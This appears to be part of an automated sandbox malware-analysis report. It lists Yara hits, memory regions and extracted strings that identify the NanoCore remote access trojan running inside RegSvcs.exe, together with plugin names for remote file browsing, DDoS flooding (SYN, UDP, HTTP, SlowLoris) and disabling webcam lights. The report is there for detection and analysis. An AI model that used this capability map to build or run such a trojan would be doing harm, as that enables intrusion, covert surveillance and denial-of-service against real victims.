Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR
Source: boaliim.dat Binary or memory string: WIN_81
Source: boaliim.dat Binary or memory string: WIN_XP
Source: boaliim.dat.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: boaliim.dat Binary or memory string: WIN_XPe
Source: boaliim.dat Binary or memory string: WIN_VISTA
Source: boaliim.dat Binary or memory string: WIN_7
Source: boaliim.dat Binary or memory string: WIN_8

Remote Access Functionality

Source: boaliim.dat, 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUpload
OpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttrib
uteSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyge
t_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywo
rdAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionA
ttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.Compone